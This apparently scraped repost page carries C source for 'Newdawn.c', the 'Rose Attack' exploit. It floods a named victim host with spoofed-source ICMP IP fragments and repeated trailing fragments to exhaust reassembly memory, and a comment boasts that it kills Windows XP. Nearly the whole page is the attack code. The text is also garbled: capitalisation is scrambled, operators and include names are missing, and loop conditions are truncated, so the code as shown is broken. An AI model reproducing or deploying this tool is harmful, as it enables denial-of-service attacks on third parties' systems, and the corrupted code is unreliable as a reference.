2. Tech
  3. Newdawn.c

Newdawn.c

xiaoxiao2021-03-06  62

/ ***

Rose Attack (Variation 2) (CHUCK (AT) Lemure.Net)

Discovered by:

Gandalf (at) DIGITAL.NET

Code Modified from larme igmp attack by:

Kox by Coolio (Coolio (AT) K-r4D.com)

Sends out small ip fragments totalling up to a large

ICMP Packet. Then ReateDly Sends Last IP Fragment Forcing

Reassembly Code to Traverse To Last IP Fragment in Order To

Do a free () FOLLOWED by a malloc (). Or So It Seems.

Reportedly Works for TCP / UDP AS Well, Since this IS

A ip layer attic.

*** /

/ * Just A Thousand Kills Win XP * /

#define num_packets 100

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

Void usage (char * arg)

{

Printf ("Rose Attack / N");

Printf ("USAGE:% s [Source] / N", ARG);

Printf ("IF Source Not Specified, Will Send Out from Random IP's / N");

Exit (1);

}

unsigned int randip ()

{

Struct hostent * he;

Struct SockAddr_in sin;

Char * buf = (char *) Calloc (1, sizeof (char) * 16);

Sprintf (buf, "% d.% d.% d.% d",

(Random ()% 191) 23,

(Random ()% 253) 1,

(Random ()% 253) 1,

(Random ()% 253) 1);

Return INET_ADDR (BUF);

}

Unsigned Short In_cksum (unsigned short * buh, int LEN)

{

Register long sum = 0;

UNSIGNED SHORT ODDBYTE;

Register unsigned short answer;

While (len> 1) {

SUM = * buh ;

LEN - = 2;

}

IF (len == 1) {

ODDBYTE = 0;

* ((unsigned char *) & oddbyte) = * (unsigned char *) buh; sum = oddbyte;

}

SUM = (SUM >> 16) (SUM & 0xFFF);

SUM = (SUM >> 16);

Answer = ~ SUM;

Return Answer;

}

INT Fire_Away (Struct SockAddr_in * Victim, Unsigned Long SRC)

{

INT Smallicmp = 1;

UNSIGNED Char * Pkt;

Struct iphdr * ip;

Struct IGMPHDR * IGMP;

Struct ICMPHDR * ICMP_PKT;

Struct Utsname * UN;

Struct Passwd * P;

Int idlist [num_packets];

Unsigned long j;

INT I, S;

INT ID = (Random ()% 40000) 500;

For (i = 0; i

IDLIST [I] = (random ()% 40000) 500;

PKT = (unsigned char *) Calloc (1, Smallicmp)

SIZEOF (STRUCT IPHDR)

SizeOf (struct icmphdr);

IP = (struct iphdr *) pkt;

ICMP_PKT = (Struct ICMphDR *) (PKT SIZEOF (Struct iPhdr));

IP-> Version = 4;

IP-> IHL = (SIZEOF * IP) / 4;

IP-> TTL = 255;

IP-> Tot_len = HTons (Smallicmp);

IP-> protocol = 1;

IP-> ID = HTONS (ID);

IP-> FRAG_OFF = HTONS (IP_MF);

IP-> Saddr = SRC;

IP-> DADDR = VICTIM-> SIN_ADDR.S_ADDR;

IP-> CHECK = IN_CKSUM ((unsigned short *) IP, sizeof (struct iPhdr));

ICMP_PKT-> TYPE = ICMP_ECHO;

ICMP_PKT-> CODE = 0;

ICMP_PKT-> CHECKSUM = 1000;

ICMP_PKT-> un.echo.id = random ()% 255;

ICMP_PKT-> un.echo.sequence = random ()% 255;

For (i = sizeof (struct iPhdr) sizeof (struct ICMphdr) 1;

I

PKT [I] = random ()% 255;

}

IF ((S = Socket, Sock_RAW, IPPROTO_RAW) <0) {

Perror ("Error: socket ()");

Return 1;

}

Printf ("Sending Out Series Of Fragments / R / N");

For (i = 0; i

IP-> ID = HTONS (IDList [i]);

For (j = 0; j <8170; j = smallicmp 1) {

IP-> FRAG_OFF = HTONS (J | IP_MF);

IF (SENDTO (S, PKT,

Smallicmp SizeOf (Struct iPhdr),

0, (struct sockaddr *) Victim,

SIZEOF (STRUCT SOCKADDR_IN) == -1) {

Perror ("Error: Sendto ()");

Return 1;

}

}

}

Printf ("Sending Out Tailing Fragments / R / N");

/ * BIG FRAG At end ... * /

/ * Sending a large amount of the end fragments over and

OVER. this is definitely overkill, but see to work * /

For (j = 0; j <9999 * num_packets; j ) {

For (i = 0; i

IP-> ID = HTONS (IDList [i]);

IP-> FRAG_OFF = HTONS (8190 | IP_MF);

// ip-> Frag_off = HTONS (8100 | IP_MF);

Sendto (S, PKT, SIZEOF (STRUCT IPHDR) Smallicmp,

0, (struct sockaddr *) Victim,

SizeOf (struct sockaddr_in);

/ * if you do sleep, cpu usage goes way down. But memory usage

STILL CREEPS UPWARD * /

// Usleep (100); // Sleep After Every Trailing Packet

}

Usleep (100); // Sleep After Every Series of Num_packets

}

Free (pkt);

Close (s);

Return 0;

}

Int main (int Argc, char * argv [])

{

Struct SockAddr_in Victim;

Struct hostent * he;

Unsigned long source;

INT I;

Srandom (Time (NULL));

IF (Argc <2)

USAGE (Argv [0]);

IF ((he = gethostByname) == null) {

Herror (Argv [1]);

Exit (1);

}

IF (argc> 2) {

Source = INET_ADDR (Argv [2]);

}

Else {

Source = randip ();

}

Memcpy (& Victim.sin_addr.s_addr, he-> h_addr, he-> h_length);

Victim.sin_port = htons (0);

Victim.sin_family = pf_inet;

Printf ("Sending ICMP FRAGMENTS: / R / N");

Fflush (stdout);

Fire_Away (& Victim, Source);

IF (argc <3) {

Source = randip ();

}

Fflush (stdout);

Printf ("/ ndone / n"); fflush (stdout);

}

转载请注明原文地址:https://www.9cbs.com/read-112115.html

9cbs

New Post(0)